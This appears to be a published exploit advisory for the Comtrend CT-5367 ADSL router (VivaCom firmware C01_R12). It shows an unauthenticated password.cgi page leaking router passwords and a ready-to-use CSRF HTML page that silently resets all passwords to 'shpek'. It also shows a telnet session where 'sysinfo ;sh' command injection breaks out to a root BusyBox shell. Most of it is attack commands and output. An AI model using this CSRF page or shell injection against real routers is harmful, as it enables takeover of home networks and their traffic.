/*COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Remote Root
=============================================================================
Board ID : 96338A-122
Software : A111-312BTC-C01_R12
Bootloader : 1.0.37-12.1-1
Wireless Driver : 4.170.16.0.cpe2.1sd
ADSL : A2pB023k.d20k_rc2
=============================================================================
Type : HardWare
Risk of use : High
Type to use : Remote
Discovered by : Todor Donev
Author Email : todor.donev@gmail.com
=============================================================================
Special greetz to my sweetheart friend and my lil' secret Tsvetelina Emirska,
and all my other friends that support me a lot of times for everything !!
*/

root@linux:~# get.pl http://192.168.1.1/
/*HTTP/1.1 401 Unauthorized
Cache-Control: no-cache
Connection: close
Date: Sat, 01 Jan 2000 00:04:31 GMT
Server: micro_httpd ## Yeah !! Bite me :(
WWW-Authenticate: Basic realm="DSL Router"
Content-Type: text/html

<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>
Authorization required.
<HR>
<ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS>
</BODY></HTML>
*/

root@linux:~# get.pl http://192.168.1.1/password.cgi ## Information Disclosure: answered 200 with no credentials sent, while / above returned 401
/*HTTP/1.1 200 Ok
Cache-Control: no-cache
Connection: close
Date: Mon, 03 Jan 2000 23:01:25 GMT
Server: micro_httpd
Content-Type: text/html

<html>
<head>
<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
<link rel="stylesheet" href='https://www.exploit-db.com/exploits/16275/stylemain.css' type='text/css'>
<link rel="stylesheet" href='https://www.exploit-db.com/exploits/16275/colors.css' type='text/css'>
<script language="javascript" src="https://www.exploit-db.com/exploits/16275/util.js"></script>
<script language="javascript">
<!-- hide\n ## Dammit!
=))
pwdAdmin = '<CENSORED>'; ## Censored Password
pwdSupport = '<CENSORED>'; ## Censored Password
pwdUser = '<CENSORED>';\n ## Censored Password
*/

[CUT EXPLOIT HERE] ## CSRF to change all passwords
<html>
<head></head>
<title>COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Change All passwords</title>
<body onLoad=javascript:document.form.submit()>
<form action="http://192.168.1.1/password.cgi"; method="POST" name="form">
<!-- Change default system Passwords to "shpek" without authentication and verification -->
<input type="hidden" name="sptPassword" value="shpek">
<input type="hidden" name="usrPassword" value="shpek">
<input type="hidden" name="sysPassword" value="shpek">
</form>
</body>
</html>
[CUT EXPLOIT HERE]

root@linux:~# telnet 192.168.1.1
ADSL Router Model CT-5367 Sw.Ver. C01_R12
Login: root
Password: ## BINGOO !! Godlike =))
> ?
? help logout reboot adsl atm ddns dumpcfg ping siproxd sntp sysinfo tftp wlan version build ipfilter
> sysinfo
Number of processes: 30
11:46pm up 2 days, 23:46, load average: 1 min:0.12, 5 min:0.05, 15 min:0.09
        total   used   free   shared   buffers
Mem:    14012   13028   984   0        588
Swap:   0       0       0
Total:  14012   13028   984
> sysinfo ;sh ## JAILBREAK !! FirmWare sucks:) -- the restricted CLI hands the whole line to a shell unfiltered (the ps output below shows 'sh -c sysinfo ;sh')
Number of processes: 30
11:47pm up 2 days, 23:47, load average: 1 min:0.07, 5 min:0.05, 15 min:0.08
        total   used   free   shared   buffers
Mem:    14012   13024   988   0        588
Swap:   0       0       0
Total:  14012   13024   988

BusyBox v1.00 (2009.12.08-09:42+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.
# cat /proc/version
Linux version 2.6.8.1 (wander@localhost.localdomain) (gcc version 3.4.2) #1 Tue Dec 8 17:40:39 CST 2009
# ps
  PID Uid   VmSize Stat Command
    1 root     280 S    init
    2 root         SWN  [ksoftirqd/0]
    3 root         SW<  [events/0]
    4 root         SW<  [khelper]
    5 root         SW<  [kblockd/0]
   15 root         SW   [pdflush]
   16 root         SW   [pdflush]
   17 root         SW   [kswapd0]
   18 root         SW<  [aio/0]
   23 root         SW   [mtdblockd]
   32 root     328 S    -sh
   65 root    1384 S    cfm
   72 root         SW   [bcmsw]
  192 root     216 S    pvc2684d
  275 root     496 S    nas -P /var/wl0nas.lan0.pid -H 34954 -l br0 -i wl0 -A
  342 root     304 S    dhcpd
  596 root    1384 S    CT_Polling
  600 root     432 S    pppd -c 0.0.35.1 -i nas_0_0_35 -u <CENSORED> -p
  931 root     248 S    dhcpc -i nas_0_0_40
  993 root     316 S    dproxy -D btc-adsl
  997 root     352 S    upnp -L br0 -W ppp_0_0_35_1 -D
 1013 root     512 S    siproxd --config /var/siproxd/siproxd.conf
 1014 root     512 S    siproxd --config /var/siproxd/siproxd.conf
 1015 root     512 S    siproxd --config /var/siproxd/siproxd.conf
10745 root     292 S    syslogd -C -l 7
10747 root     256 S    klogd
 6616 root    1396 S    telnetd
 6618 root    1428 S    telnetd
 6673 root     284 S    sh -c sysinfo ;sh
 6724 root     284 R    ps
# top
Mem: 13164K used, 848K free, 0K shrd, 588K buff, 5920K cached
Load average: 0.00, 0.02, 0.07 (State: S=sleeping R=running, W=waiting)

  PID USER STATUS  RSS  PPID %CPU %MEM COMMAND
 6751 root R       288  6675  0.7  2.0 exe
    2 root SWN       0     1  0.3  0.0 ksoftirqd/0
 6616 root S      1396    65  0.1  9.9 telnetd
  931 root S       248     1  0.1  1.7 dhcpc
 6618 root S      1428  6616  0.0 10.1 telnetd
   65 root S      1384    32  0.0  9.8 cfm
  596 root S      1384    65  0.0  9.8 CT_Polling
 1013 root S       512     1  0.0  3.6 siproxd
 1014 root S       512  1013  0.0  3.6 siproxd
 1015 root S       512  1014  0.0  3.6 siproxd
  275 root S       496     1  0.0  3.5 nas
  600 root S       432     1  0.0  3.0 pppd
  997 root S       352     1  0.0  2.5 upnp
   32 root S       328     1  0.0  2.3 sh
  993 root S       316     1  0.0  2.2 dproxy
 6675 root S       316  6673  0.0  2.2 exe
  342 root S       304     1  0.0  2.1 dhcpd
10745 root S       292     1  0.0  2.0 exe
 6673 root S       284  6618  0.0  2.0 sh
    1 root S       280     0  0.0  1.9 init
# echo * ## ls o.O?!?
bin dev etc lib linuxrc mnt proc sbin usr var webs
#